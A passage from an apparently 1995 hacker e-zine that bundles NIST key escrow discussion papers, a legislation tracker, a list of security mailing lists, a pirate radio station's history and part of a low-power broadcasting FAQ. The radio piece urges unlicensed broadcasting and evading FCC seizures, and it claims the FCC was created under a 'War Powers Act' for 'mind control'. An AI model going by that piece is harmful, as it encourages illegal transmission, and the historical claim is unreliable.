not function with non-escrowed products (or tampered
escrowed products)? How can this be tested?

* Limiting surveillance -- How can products be designed so
that information both sent and received by the user can be
decrypted without release of keys of other users?

* Practical Key Access -- How can mechanisms be designed so
that repeated involvement of escrow agents is not required
for decryption for multiple files/messages during the
specified access period?

* Assurance that keys are escrowed -- How can it be assured
that key escrow products are indeed satisfactorily escrowed?
For example, products could be required to be escrowed at
time of manufacture or be made inoperable until properly
escrowed.

* Ability to re-escrow keys -- How can products be designed so
that new keys can be escrowed at the user's discretion with
a U.S. Government approved escrow agent?

* Certified escrow agents -- Can products be designed so that
only escrow agents certified by the U.S. government
(domestic, or under suitable arrangements, foreign) are
utilized? What should be the criteria for an acceptable
U.S. escrow agent?

--------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses. The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.


Note: These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland). The meeting will be open to the public, although
seating is limited. Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

-----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


Discussion Issues:
Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1) Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined. Some of the issues which need to be discussed and
resolved include the following:

* What kinds of organizations should be excluded from
consideration as approved key escrow agents?

* What sort of legal agreement between the government and the
key escrow agent is necessary to stipulate the
responsibilities of the agent? Should this include the
terms and conditions under which release of a key is
required?

* How will liability for unauthorized release of key be
handled?

* Should, for example, intentionally misreleasing or
destroying a key be criminalized? Should this include other
actions?

* How can the government's needs for confidentiality of key
release be handled?

* Should approval of key escrow agents be tied to a public key
infrastructure (for digital signatures and other purposes)?

* What procedures need to be developed for the storage and
safeguarding of keys?

* What are the acceptable performance criteria (e.g., around-
the-clock availability, accessibility, reliability, etc.)
for approved key escrow agents?

* Under what circumstances will key escrow agents in foreign
countries be approved?

* What process will be used to approve escrow agents?
Costs/who pays?
---------
(*1) "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note: These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland). The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail: carlton@micf.nist.gov.

8/25/95

____________________________________________________________________________
Internet Freedom and Family Empowerment Act (HR 1978, S n.a.)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
HR 1978 is an attempt to recognize the unique medium that is
online systems and avoid legislating censorship. It would:
-prohibit the FCC from regulating constitutionally-protected
online speech
-absolve sysops and services from liability if they take
good faith measures to screen their content or provide
parental-screening software

See directions below for obtaining analyses from various
organizations.

House sponsors and cosponsors: Cox (R-CA), Wyden (D-OR), Matsui (D-CA),
White (R-WA), Stupak (D-MI), Rohrabacher (R-CA)

House status:
HR 1978 was passed 8/4/95 by the House in a vote (421-4).

Where to get more info:
Email: vtw@vtw.org (with "send hr1978" in the subject line)
Gopher: gopher -p 1/vtw/exon gopher.panix.com
WWW: http://www.panix.com/vtw/exon

____________________________________________________________________________
1995 COMMUNICATIONS DECENCY ACT (CDA) (Passed Senate, HR 1004)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
The CDA would criminalize electronic speech currently protected
in print by the First Amendment.

House CDA sponsors: Johnson (D-SD)

House status:
HR1004 will probably never leave committee.

Senate status:
The Senate affirmed the Communications Decency Act (84-16)
as amended to the Telecommunications Reform bill (S 652).

Where to get more info:
WWW: http://www.panix.com/vtw/exon
http://www.eff.org/
http://www.cdt.org/
http://epic.org/free_speech
Gopher: gopher -p 1/vtw/exon gopher.panix.com
gopher gopher.eff.org
Email: vtw@vtw.org (with "send cdafaq" in the subject line)
cda-status@cdt.org
cda-info@cdt.org

____________________________________________________________________________
Child Protection, User Empowerment, and Free Expression in Interactive
Media Study Act (Amendment to HR1555 in the House, S 714)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
Would direct the Department of Justice to study whether current
law is sufficient to cover enforcement of existing obscenity
laws on computers networks.

Senate sponsors: Leahy (D-VT)

Senate status:
Currently unattached to any legislation; attempted attachment to
S.652 but failed (6/14/95).

House sponsors: Klink (D-PA)

House status:
Amended to HR 1555 in committee.

____________________________________________________________________________
Last-minute provisions of the Manager's Mark amendment to HR1555 (added to
HR1555 at the last minute)

*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
Criminalizes many forms of constitutionally-protected speech
when they are expressed online.

House sponsors: Unknown

House status:
Amended to HR 1555 through the Manager's Mark on 8/4/95.

____________________________________________________________________________
1995 Protection of Children from Computer Pornography Act (S 892)

Description:
Would make Internet Service Providers liable for shielding
people under 18 from all indecent content on the Internet.

Senate sponsors: Dole (R-KS), Coats (R-IN), Grassley (R-IA), McConnell (R-KY),
Shelby (R-AL), Nickles (R-OK), Hatch (R-UT)

Senate status:
A hearing was held Monday July 24th. No action on the bill
has happened yet as a result of that hearing.

____________________________________________________________________________
Anti-Electronic Racketeering Act of 1995 (HR n.a., S 974)

Description:
S 974 has many effects (not good) on law enforcement's use of
intercepted communications. It would also make it unlawful for
any person to publicly disseminate encoding or encrypting
software including software *currently allowed* to be exported
unless it contained a "universal decoding device". This
more than likely means that Clipper-style key escrow systems
could be disseminated, but not strong, private cryptography.

Senate sponsors: Grassley (R-IA)

Senate status: Currently not active and probably won't move before the
August recess.

Senate citizen action required:
Request bill below and familiarize yourself with it. VTW is
tracking this bill, and will alert you when there is movement.
There is no Congressional action to take right now; as other
bills (such as the Communications Decency Act) pose a greater,
more immediate threat.

House of Representatives status: No House version is currently enrolled.

Where to get more info:
Email: vtw@vtw.org (with "send s974" in the subject line)
Gopher: URL:gopher://gopher.panix.com:70/11/vtw/

____________________________________________________________________________
End VTW BillWatch Issue #15, Date: Sat Aug 26 15:07:25 EDT 1995
============================================================================

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #5 of 9

Security Resources List

By: Christopher Klaus


This was put together to hopefully promote greater awareness of the security
lists that already exist. Most security mailing lists have been only
announced once and it was only word of mouth that it would acquire new
members. This list should hopefully make the membership grow for each
mailing list.

If you know of any mailing lists that have been skipped, please e-mail
cklaus@iss.net with the info.

The newest updates for this will be on http://iss.net/. This web site
also contains info for the following security issues:

Vendor security contacts
Security Patches
What to do if you are compromised
Set up Anon ftp securely
Sniffers attacks and solutions



Security Mailing Lists

The following FAQ is a comprehensive list of security mailing lists. These
security mailing lists are important tools to network administrators, network
security officers, security consultants, and anyone who needs to keep abreast
of the most current security information available.

General Security Lists

* 8lgm (Eight Little Green Men)
* Academic-Firewalls
* Best of Security
* Bugtraq
* Computer Privacy Digest (CPD)
* Computer Underground Digest (CuD)
* Cypherpunks
* Cypherpunks-Announce
* Firewalls
* Intruder Detection Systems
* Phrack
* PRIVACY Forum
* Risks
* Sneakers
* Virus
* Virus Alert

Security Products

* Tiger
* TIS Firewallk Toolkit

Vendors and Organizations

* CERT
* CIAC
* HP
* Sun

-------------------------------------------------------------------------------

8lgm (Eight Little Green Men)

To join, send e-mail to majordomo@8lgm.org and, in the text of your message
(not the subject line), write:

subscribe 8lgm-list

Group of hackers that periodically post exploit scripts for various Unix bugs.

-------------------------------------------------------------------------------

Academic Firewalls

To join, send e-mail to majordomo@net.tamu.edu and, in the text of your message
(not the subject line), write:

SUBSCRIBE Academic-Firewalls

This is an unmoderated list maintained by Texas A&M University. Its purpose is
to promote the discussion and use of firewalls and other security tools in an
academic environment. It is complementary to the Firewalls list maintained by
Brent Chapman (send subscription requests to Majordomo@GreatCircle.COM) which
deals primarily with firewall issues in a commercial environment. Academic
environments have different political structures, ethical issues, expectations
of privacy and expectations of access.

Many documented incidents of cracker intrusions have either originated at or
passed through academic institutions. The security at most universities is
notoriously lax or even in some cases completely absent. Most institutions
don't use firewalls because they either don't care about their institution's
security, they feel firewalls are not appropriate or practical, or they don't
know the extent to which they are under attack from the Internet.

At Texas A&M University we have been using a combination of a flexible packet
filter, intrusion detection tools, and Unix security audit utilities for almost
two years. We have found that simple firewalls combined with other tools are
feasible in an academic environment. Hopefully the discussion on this list will
begin to raise the awareness of other institutions also.

-------------------------------------------------------------------------------

Best of Security

To join, send e-mail to best-of-security-request@suburbia.net with the
following in the body of the message:

subscribe best-of-security

REASONS FOR INCEPTION

In order to compile the average security administrator it was found that the
compiler had to parse a foreboding number of exceptionally noisy and
semantically-content-free data sets. This led to exceptionally high load
averages and a dramatic increase in core entropy.

Further, the number, names and locations of this data appears to change on an
almost daily basis; requiring tedious version control on the part of the mental
maintainer. Best-of-Security is at present an un-moderated list. That may sound
strange given our stated purpose of massive entropy reduction; but because best
often equates with "vital" and the moderator doesn't have an MDA habit it is
important that material sent to this list be delivered to its subscribers' in
as minimal period of time as is (in)humanly possible.

If you find *any* information from *any* source (including other mailinglists,
newsgroups, conference notes, papers, etc) that fits into one of the acceptable
categories described at the end of this document then you should *immediately*
send it to "best-of-security@suburbia.net". Do not try and predict whether or
not someone else will send the item in question to the list in the immediate
future. Unless your on a time-delayed mail vector such as polled uucp or the
item has already appeared on best-of-security, mail the info to the list! Even
if it is a widely deployed peice of information such as a CERT advisory the
proceeding argument still applies. If the information hasn't appeared on this
list yet, then SEND IT. It is far better to run the risk of minor duplication
in exchange for having the information out where it is needed than act
conservatively about occasional doubling up on content.

-------------------------------------------------------------------------------

Bugtraq

To join, send e-mail to LISTSERV@NETSPACE.ORG and, in the text of your message
(not the subject line), write:

SUBSCRIBE BUGTRAQ

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vunerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

* Information on Unix related security holes/backdoors (past and present)
* Exploit programs, scripts or detailed processes about the above
* Patches, workarounds, fixes
* Announcements, advisories or warnings
* Ideas, future plans or current works dealing with Unix security
* Information material regarding vendor contacts and procedures
* Individual experiences in dealing with above vendors or security
organizations
* Incident advisories or informational reporting

-------------------------------------------------------------------------------

Computer Privacy Digest

To join, send e-mail to comp-privacy-request@uwm.edu and, in the text of your
message (not the subject line), write:

subscribe cpd

The Computer PRIVACY Digest (CPD) (formerly the Telecom Privacy digest) is run
by Leonard P. Levine. It is gatewayed to the USENET newsgroup
comp.society.privacy. It is a relatively open (i.e., less tightly moderated)
forum, and was established to provide a forum for discussion on the effect of
technology on privacy. All too often technology is way ahead of the law and
society as it presents us with new devices and applications. Technology can
enhance and detract from privacy.

-------------------------------------------------------------------------------

Computer Underground Digest

To join, send e-mail to LISTSERV@VMD.CSO.UIUC.EDU and, in the text of your
message (not the subject line), write:

SUB CUDIGEST

CuD is available as a Usenet newsgroup: comp.society.cu-digest

Covers many issues of the computer underground.

-------------------------------------------------------------------------------

Cypherpunks

To join, send e-mail to majordomo@toad.com and, in the text of your message
(not the subject line), write:

SUBSCRIBE cypherpunks

The cypherpunks list is a forum for discussing personal defenses for privacy in
the digital domain. It is a high volume mailing list.

-------------------------------------------------------------------------------

Cypherpunks Announce

To join, send e-mail to majordomo@toad.com and, in the text of your message
(not the subject line), write:

SUBSCRIBE cypherpunks-announce

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and important
developments will be posted there.

-------------------------------------------------------------------------------

Firewalls

To join, send e-mail to majordomo@greatcircle.com and, in the text of your
message (not the subject line), write:

SUBSCRIBE firewalls

Useful information regarding firewalls and how to implement them for security.

This list is for discussions of Internet "firewall" security systems and
related issues. It is an outgrowth of the Firewalls BOF session at the Third
UNIX Security Symposium in Baltimore on September 15, 1992.

-------------------------------------------------------------------------------

Intrusion Detection Systems

To join, send e-mail to majordomo@uow.edu.au with the following in the body of
the message:

subscribe ids

The list is a forum for discussions on topics related to development of
intrusion detection systems.

Possible topics include:

* techniques used to detect intruders in computer systems and computer
networks
* audit collection/filtering
* subject profiling
* knowledge based expert systems
* fuzzy logic systems
* neural networks
* methods used by intruders (known intrusion scenarios)
* cert advisories
* scripts and tools used by hackers
* computer system policies
* universal intrusion detection system

-------------------------------------------------------------------------------

Phrack

To join, send e-mail to phrack@well.com and, in the text of your message (not
the subject line), write:

SUBSCRIBE Phrack

Phrack is a Hacker Magazine which deals with phreaking and hacking.

-------------------------------------------------------------------------------

PRIVACY Forum

To join, send e-mail to privacy-request@vortex.com and, in the text of your
message (not the subject line), write:

information privacy

The PRIVACY Forum is run by Lauren Weinstein. He manages it as a rather
selectively moderated digest, somewhat akin to RISKS; it spans the full range
of both technological and non-technological privacy-related issues (with an
emphasis on the former).

-------------------------------------------------------------------------------

Risks

To join, send e-mail to risks-request@csl.sri.com and, in the text of your
message (not the subject line), write:

SUBSCRIBE

Risks is a digest that describes many of the technological risks that happen in
today's environment.

-------------------------------------------------------------------------------

Sneakers

To join, send e-mail to majordomo@CS.YALE.EDU and, in the text of your message
(not the subject line), write:

SUBSCRIBE Sneakers

The Sneakers mailing list is for discussion of LEGAL evaluations and
experiments in testing various Internet "firewalls" and other TCP/IP network
security products.

* Vendors are welcome to post challenges to the Internet network security
community
* Internet users are welcome to post anecdotal experiences regarding
(legally) testing the defenses of firewall and security products.
* "Above board" organized and/or loosely organized wide area tiger teams
(WATTs) can share information, report on their progress or eventual
success here.

There is a WWW page with instructions on un/subscribing as well as posting, and
where notices and pointers to resources (especially if I set up an archive of
this list) may be put up from time to time:

http://www.cs.yale.edu/HTML/YALE/CS/HyPlans/long-morrow/sneakers.html

-------------------------------------------------------------------------------

Virus

To join, send e-mail to LISTSERV@lehigh.edu and, in the text of your message
(not the subject line), write:

SUBSCRIBE virus-l your-name

It is an electronic mail discussion forum for sharing information and ideas
about computer viruses, which is also distributed via the Usenet Netnews as
comp.virus. Discussions should include (but not necessarily be limited to):
current events (virus sightings), virus prevention (practical and theoretical),
and virus related questions/answers. The list is moderated and digested. That
means that any message coming in gets sent to me, the editor. I read through
the messages and make sure that they adhere to the guidelines of the list (see
below) and add them to the next digest. Weekly logs of digests are kept by the
LISTSERV (see below for details on how to get them). For those interested in
statistics, VIRUS-L is now up to about 2400 direct subscribers. Of those,
approximately 10% are local redistribution accounts with an unknown number of
readers. In addition, approximately 30,000-40,000 readers read comp.virus on
the USENET.

-------------------------------------------------------------------------------

Virus Alert

To join, send e-mail to LISTSERV@lehigh.edu and, in the text of your message
(not the subject line), write:

SUBSCRIBE valert-l your-name

What is VALERT-L?

It is an electronic mail discussion forum for sharing urgent virus warnings
among other computer users. Postings to VALERT-L are strictly limited to
warnings about viruses (e.g., "We here at University/Company X just got hit by
virus Y - what should we do?"). Followups to messages on VALERT-L should be
done either by private e-mail or to VIRUS-L, a moderated, digested, virus
discussion forum also available on this LISTSERV, LISTSERV@LEHIGH.EDU. Note
that any message sent to VALERT-L will be cross-posted in the next VIRUS-L
digest. To preserve the timely nature of such warnings and announcements, the
list is moderated on demand (see posting instructions below for more
information).

What VALERT-L is *not*?

A place to to anything other than announce virus infections or warn people
about particular computer viruses (symptoms, type of machine which is
vulnerable, etc.).

-------------------------------------------------------------------------------

Security Products

-------------------------------------------------------------------------------

Tiger

To join, send e-mail to majordomo@net.tamu.edu and, in the text of your message
(not the subject line), write:

SUBSCRIBE tiger

Discussion list for the UNIX security audit tool TIGER

This is the TIGER users mailling list. It is for:

1. Update announcements
2. Reporting bugs in TIGER.
3. Discussing new features for TIGER.
4. Discussing use of TIGER.
5. Discussing anything else about TIGER.

What is TIGER?

TIGER is a set of shell scripts, C code and configuration files which are used
to perform a security audit on UNIX systems. The goals for TIGER are to make it
very robust and easy to use. TIGER was originally developed for checking hosts
at Texas A&M University following a break in in the Fall of 1992.

The latest version of TIGER is always available from the directory
net.tamu.edu:/pub/security/TAMU. In addition, updated digital signature files
for new platforms and new security patches will be maintained in the directory:

net.tamu.edu:/pub/security/TAMU/tiger-sigs.

-------------------------------------------------------------------------------

TIS Firewall Toolkit

To join, send e-mail to fwall-users-request@tis.com and, in the text of your
message (not the subject line), write:

SUBSCRIBE

Discussion list for the TIS firewall toolkit

-------------------------------------------------------------------------------

Vendors and Organizations

-------------------------------------------------------------------------------

CERT (Computer Emergency Response Team) Advisory mailing list.

To join, send e-mail to cert@cert.org and, in the text of your message (not the
subject line), write:

I want to be on your mailing list.

Past advisories and other information related to computer security are
available for anonymous FTP from cert.org (192.88.209.5).

-------------------------------------------------------------------------------

The CIAC (Computer Incident Advisory Capability) of DoE

CIAC has several self-subscribing mailing lists for electronic publications:

1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. CIAC-NOTES for Notes, a collection of computer security articles;
3. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI)
software updates, new features, distribution and availability;
4. SPI-NOTES, for discussion of problems and solutions regarding the use of
SPI products.

To join, send e-mail to ciac-listproc@llnl.gov and, in the text of your message
(not the subject line), write any of the following examples:

subscribe ciac-bulletin LastName, FirstName PhoneNumber
subscribe ciac-notes LastName, FirstName PhoneNumber
subscribe spi-announce LastName, FirstName PhoneNumber
subscribe spi-notes LastName, FirstName PhoneNumber
e.g., subscribe ciac-notes O'Hara, Scarlett 404-555-1212

You will receive an acknowledgment containing address, initial PIN, and
information on how to change either of them, cancel your subscription, or get
help.

-------------------------------------------------------------------------------

HP, Hewlett Packard

To join, send e-mail to support@support.mayfield.hp.com and, in the text of
your message (not the subject line), write:

subscribe security_info

The latest digest of new HP Security Bulletins will be distributed directly to
your mailbox on a routine basis.
-------------------------------------------------------------------------------

Sun Security Alert

To join, send e-mail to security-alert@sun.com and, in the subject of your
message write:

SUBSCRIBE CWS your-email-addr

The message body should contain affiliation and contact information.

-------------------------------------------------------------------------------

Copyright

This paper is Copyright (c) 1995
by Christopher Klaus of Internet Security Systems, Inc.

Permission is hereby granted to give away free copies electronically. You may
distribute, transfer, or spread this paper electronically. You may not pretend
that you wrote it. This copyright notice must be maintained in any copy made.
If you wish to reprint the whole or any part of this paper in any other medium
excluding electronic medium, please ask the author for permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in connection with the use
or spread of this information. Any use of this information is at the user's own
risk.

Address of Author

Please send suggestions, updates, and comments to:
Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
<iss@iss.net>

Internet Security Systems, Inc.

Internet Security Systems, Inc, located in Atlanta, Ga., specializes in the
developement of security scanning software tools. Its flagship product,
Internet Scanner, is software that learns an organization's network and probes
every device on that network for security holes. It is the most comprehensive
"attack simulator" available, checking for over 100 security vulnerabilities.
--
Christopher William Klaus Voice: (770)441-2531. Fax: (770)441-2431
Internet Security Systems, Inc. "Internet Scanner lets you find
2000 Miller Court West, Norcross, GA 30071 your network security holes
Web: http://iss.net/ Email: cklaus@iss.net before the hackers do."

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #6 of 9

**************************************************
* Z O O M I N ' *
* *
* Voice of Zoom Black Magic Radio/Summer '95 *
**************************************************

T H E S T O R Y O F Z O O M . . . . .


The Beginning:
--------------
Zoom Black Magic Radio started in 1985 in Fresno, California,
because the community needed a voice. There were lots of
disenfranchised people. Zoom as we know it today started just with
us experimenting with a Radio Shack transmitter. I ran across a
friend of mine who was building a low power transmitter, and we
happened to stop by his garage one evening and he was experimenting
with AM carrier current, experimenting with radio, and we let it be
known that we were looking for a transmitter, and he just happened
to have one. He let us toy around with it. Then we built a bigger
and better one.
Then we had some minor hassles with the FCC and we moved back
to Seaside, California for a couple of monthes. Then the FCC came
there and ousted us, and we had to flee under cover of darkness
from Seaside. So we went back to Fresno where we set up permanent
base and decided to make a stand, and we sat there for about 5 or
6 years. We were operating from an old broken-down trailer behind
a house in the West Fresno ghetto. We had a mixer, a mixing
console, a transmitter, and we had a 90-foot radio-television
tower. We had production facilities, and we were operating, at one
point, for 24 hours a day, around the clock: A regular radio
station on the air, serving the community with public service
announcements, breaking new music, dealing with community issues.
We offered some sort of a training facility. Many young people
wanted to get into radio, and we opened our doors to them.

The Busts:
----------
Zoom has been busted three times by the FCC. Three times they
have come and stolen our equipment even though we've never broken
any laws. The last one really hurt us. They came onto my father's
property and took our equipment, thousands of dollars worth of
equipment. The FCC lied to the press, to the public, stating that
through the use of sophisticated computerized equipment, they were
able to track us down. Well the FCC never had to track us down,
because we were completely open about what we were doing. In fact
we sent several letters to the FCC, so it wasn't a matter of them
tracking us down.
We weren't even on the air during the last bust. Yet they got
a warrant to search and seize and brought in a dozen U.S. Marshals
and 5 people from the FCC. They came into the yard like storm
troopers, tearing through the house. They were looking under beds,
in closets, everywhere, when it was really uncalled for, because
everyone in Fresno knew the transmitter was in our transmitter
shack. Their attitude was that you will not say certain things or
you will come under martial law.

The Last Year and a Half:
-------------------------
We did a thing with Ice Cube. His Predator LP was about to
come out. Ice Cube, like many other rappers was under fire and
couldn't get airplay. We were approached to break the Predator
album, we broke it here in L.A. We agreed with much of the content
and we were excited to do it. We moved the transmitter to L.A. and
set up for the first time on Ice Cube's property in Baldwin Hills.
We set up there in the hills and then we went down to Roscoes
Chicken and Waffles, where we also set up. We did two broadcasts.

The Future:
-----------
Zoom Black Magic Radio is on the air in Fresno sporadically
now. That will continue. But we can't operate openly anymore
because we can't afford to lose any more equipment. We're getting
ready to launch Zoom Black Magic in Los Angeles. We're testing our
equipment and we're ready to work from rooftops, tops of trees, and
possibly form the backs of vehicles. Keep cruising the dial
because we are coming!

Why is the Government so scared of unlicensed radio?
----------------------------------------------------
Zoom Black Magic and other unlicensed broadcasters are under
constant attack by the government for one simple reason: The fact
that you can spend $150 and put a radio station on the air that
will put you on par with people who spend millions of dollars.
That is one big no-no in this corrupt system. You might be able to
contradict the lies the government puts out through the mainstream
media. They can't afford to have that.

Unlicensed radio is real radio
------------------------------
Zoom has lots of listeners. People out there, you'd be
surprised how they find out. The local press helps us. And
through word of mouth. There's a lot of people scanning the dial,
and when they hear something that is different, with a certain
amount of relevancy in terms of what is taking place, they will
listen, and they will tell their friends, and that's what we depend
on. When we're able to stay on the air consistently, our phone
lines burn up. Zoom even showed up in the Arbitron ratings once.

Where did the Federal Communications Commission come from?
----------------------------------------------------------
The FCC came into existence in the 1930s under the war powers
act to create some sort of orderliness in the use of the airwaves.
If you dig deeper, you find that in 1933 when this War Powers Act
came up, there was a capitalist group in this country who could see
they could use this new technology both for mind control and to
make money. They needed a way to get their propaganda out and to
prevent anyone else from getting the truth out. So they created
broadcast groups, and ran prices up, and came up with this FCC to
make sure if you didn't have a license you couldn't play in the
game.

Who does the Zoomin'?
---------------------
Zoom founder Black Rose worked for 8 years for Disney's Retlaw
Broadcasting where he did TV production. Black Rose also was a
partner in a cable radio station for four years. Program Director
Mr. Ebony has a collection of over 6,000 jazz, soul, and rock
albums which he uses to piece together his legendary all-night
shows. Larry is the technical wizard and a wide variety of
talents, from Daddy Rich to the Gospel Lady serve as DJs. Several
people, including some peominent music publications, have agreed to
help program Zoom upon its launch in L.A.

Music & Revolution
------------------
The People's Tribune newspaper has published a special
edition, Music & Revolution, that has inside information on
unlicensed radio and much, much, more. Just write to PT, Box 3524,
Chicago, IL 60654 to get a FREE copy.

Contact Zoom!
-------------
Write to Zoom at 8 Kaviland St., Fresno, CA 93706 or call
209-268-3461. The Constitution says you've got a right to be on
the air. Do it!
. . . . . . . . . . . . . . . . . . . . . .
On TV they'll do little sound bites, little phony specials
about the plight of the economy in this country, and then they'll
turn around with a flash from the White House saying the index is
up. There's so much contradiction. For any thinking person, you
hear so much contradiction, you know by insticnt that you need a
voice of your own. You will not be able to voice your opinion
unless you have your own source of media: print, radio, and TV.
Underground radio is going to get very big and YOU should be part
of it! If you don't have a million dollars to buy a broadcast
license, just scrape together a couple hundred dollars and drive
over to Radio Shack to get your gear!

[Black Magic Radio can now be reached on the internet, just email
rockrap@aol.com.
- Revolution]

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #7 of 9

Low Power Broadcasting FAQ (Frequently Asked Questions)

By: Rick Harrison


contents:

[1] What equipment do I need to start a station?
[2] Is low power broadcasting legal?
[3] How much power do I need?
[4] Where can I get a transmitter?
[5] What kind of antenna should I use?
[6] How do I select a frequency?
[7] Where can I get more information?

----------------------------------------------------------------------

[1] What equipment do I need to start a station?

You will need audio sources (tape players, CD players, microphones,
etc.), an audio mixer, a transmitter, a coaxial cable (usually RG-8 or
RG-58/U) to carry the signal from your transmitter to your antenna,
and an antenna.

When you are selecting audio equipment, try to get items that have
metal cases (not plastic or wood) and three-prong grounded electrical
plugs. This will reduce your chances of having problems with radio
energy from your transmitter getting into your audio gear and causing
interference.

The most important item for a low power broadcaster is the _raison_
_d'etre_, the reason for existing. You won't have a high power
signal, and you won't have billboards and TV commercials announcing
the existence of your station, so listeners will have to put some
effort into finding and receiving your signal. They probably won't
make the effort unless you are offering something unique and
interesting.

------------------------------

[2] Is low power broadcasting legal?

This depends on what country you are in. Here in the United States,
legal unlicensed broadcasting is limited to microscopic power levels.
For example, the limit for unlicensed FM transmissions is 250
microvolts per meter, measured 3 meters from the transmitting antenna;
at this power level, stereo reception with a good signal to noise
ratio is only possible within a 100 foot radius, and an average car
radio can barely detect the signal at a distance of 200 meters. On
the AM band, the limit is 0.1 watt and an antenna system no more than
3 meters long.

Violators who get caught are usually given a monetary fine, and
sometimes their equipment is confiscated. The situation varies from
country to country.

------------------------------

[3] How much power do I need?

There is no simple answer to this question. For starters, it depends
on whether you are broadcasting on the AM (medium wave) band, the FM
band, the international shortwave bands, or TV. In order to reduce
interference to other radio services, it is always a good idea to use
the lowest amount of power that will serve your target audience.

On FM and TV frequencies, raising your antenna height and improving
the gain of your antenna system is generally a better way to increase
your range than using a more powerful transmitter. If an FM or TV
broadcast antenna is only 12 feet (4 meters) above the ground, for
example if it's in the attic of a one-story building, then its range
will always be limited to a few kilometers and the signal will always
be plagued by multipath interference, even if you pump a million watts
into it.

------------------------------

[4] Where can I get a transmitter?

Below is a brief list of companies selling low power transmitter kits.
Please send me information about any companies not listed, so that I
can include them in future versions of this list.

Note to newcomers: to assemble these kits, you must be able to solder
components onto a circuit board, and it helps if you know the
difference between a resistor and a capacitor. If you haven't reached
this stage of electronic know-how yet, consider buying some of the
educational kits available from C&S Sales, 1245 Rosewood, Deerfield IL
60015, telephone 800-292-7711. Their electronic components course
(item #ECK-10, $14.95) might be especially helpful to newbies.

When assembling radio circuit kits, I prefer to use narrow-diameter
silver-bearing solder (Radio Shack #64-013) and a 15 watt soldering
iron. You will need a more powerful soldering tool for making
antennas out of large-diameter wire, soldering really large connectors
to a printed circuit board, etc., but the 15 watt iron works fine for
assembling most kits and reduces the chances of over-heating
transistors and other heat-sensitive components.

a word about the BA1404 chip:

Many of the FM kits listed below use Rohm's BA1404 integrated circuit,
which is esentially an FM transmitter in a single 18-pin chip. The
BA1404 has some limitations in sound quality. The separation between
the left and right channels and the overall audio distortion are not
up to "broadcast standards." To get a clear idea of how bad it is,
obtain a studio reference CD (a.k.a. audio system test CD) that has a
"sweep" on it -- a sweep is a tone that steadily rises in pitch from
very low to very high -- and play the sweep through any BA1404-based
transmitter, while listening on a high-quality receiver. Blecccch!

------ sources of AM, FM, and TV transmitters: ------

DC Electronics
P O Box 3203
Scottsdale AZ 85271
phone 800-423-0070

The Improved Stereocaster is an FM stereo transmitter based on the
BA1404 chip with a few milliwatts of output power ($29.95 plus $3.50
S&H). It has a smooth fine-tuning control which makes it easy to get
on the exact frequency you want, and a voltage regulator for the
BA1404 which improves stability.

Compared to Ramsey's FM-10A, the Stereocaster doesn't drift as much,
and I think the audio quality is slightly better; however the assembly
instructions are not as clear as Ramsey's, the PC board layout is not
as elegant, and Ramsey's circuit puts out a little more power.

-----

Free Radio Berkeley
1442 A Walnut St., #406
Berkeley, CA 94709
phone 510-464-3041

Items listed in their ads include a 5 watt mono FM transmitter kit
($55 plus shipping), a 1/2 to 1 watt stereo FM transmitter kit ($50),
an FM transmitter with phase locked loop (PLL) frequency control
($95), plus kits for output filters, dummy loads, RF amplifiers, and
antennas.

FRB is spear-heading an organized challenge to the FCC's regulations
and is trying to foster a low power broadcasting movement. Contact
them for more info. (Internet: frbspd@crl.com)

Some people have posted messages in alt.radio.pirate indicating that
FRB sometimes takes several weeks or months to respond to orders.

-----

North Country Radio
PO Box 53, Wykagyl Station
New Rochelle NY 10804-0053
phone 914-235-6611
(send $1 for catalog)

Many TV-related items: a 50 milliwatt UHF transmitter with crystal
controlled frequency ($78); a "video pallete" to create special
effects; a switcher that does cross-fades and wipes; and upconverters
that will take channel 3 video from a VCR and shift its frequency up
to any UHF channel 25 thru 70. For licensed radio amateurs, they have
a line of more powerful UHF TV transmitters.

With a 100-foot range and a price of $62.50, their FM stereo trans-
mitter is not exactly competitive, but it is interesting from a
technical point of view. Their stereo infrared transmitter and
receiver could be used to build a difficult-to-trace studio-to-
transmitter link.

-----

Panaxis Productions
P O Box 130
Paradise CA 95967-0130
(send $1 for catalog, or $2 if you're in a hurry)

This company offers many interesting books and kits. The REB-1 kit is
a 100 milliwatt transmitter for the upper end of the AM band ($34.95
